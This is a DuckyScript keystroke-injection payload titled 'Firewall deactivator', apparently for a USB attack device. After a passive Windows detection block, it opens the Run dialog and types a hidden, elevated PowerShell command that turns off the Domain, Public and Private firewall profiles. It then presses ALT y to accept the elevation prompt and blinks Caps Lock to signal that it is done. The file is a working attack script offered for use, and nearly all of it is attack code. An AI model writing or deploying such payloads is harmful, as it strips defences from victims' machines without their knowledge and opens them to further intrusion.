1
REM Title:        Firewall deactivator
2
REM Author:       luu176
3
REM Description:  Deactivate all firewalls in windows machine using hidden powershell
4
REM Target:       Windows
5

6
EXTENSION PASSIVE_WINDOWS_DETECT
7
    REM VERSION 1.1
8
    REM AUTHOR: Korben
9

10
    REM_BLOCK DOCUMENTATION
11
        Windows fully passive OS Detection and passive Detect Ready
12
        Includes its own passive detect ready.
13
        Does not require additional extensions.
14

15
        USAGE:
16
            Extension runs inline (here)
17
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
18
            boot delay
19
            $_OS will be set to WINDOWS or NOT_WINDOWS
20
            See end of payload for usage within payload
21
    END_REM
22

23
    REM CONFIGURATION:
24
    DEFINE #MAX_WAIT 150
25
    DEFINE #CHECK_INTERVAL 20
26
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
27
    DEFINE #NOT_WINDOWS 7
28

29
    $_OS = #NOT_WINDOWS
30

31
    VAR $MAX_TRIES = #MAX_WAIT
32
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
33
        DELAY #CHECK_INTERVAL
34
        $MAX_TRIES = ($MAX_TRIES - 1)
35
    END_WHILE
36
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
37
        $_OS = WINDOWS
38
    END_IF
39

40
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
41
        IF ($_OS == WINDOWS) THEN
42
            STRING HELLO WINDOWS!
43
        ELSE
44
            STRING HELLO WORLD!
45
        END_IF
46
    END_REM
47
END_EXTENSION
48

49
GUI r
50
DELAY 200
51
STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
52
DELAY 800
53
ALT y
54
SAVE_HOST_KEYBOARD_LOCK_STATE
55
VAR $i = 0
56
WHILE ( $i < 9 )
57
    DELAY 150
58
    CAPSLOCK
59
    $i = ( $i + 1 )
60
END_WHILE
61
RESTORE_HOST_KEYBOARD_LOCK_STATE
62

63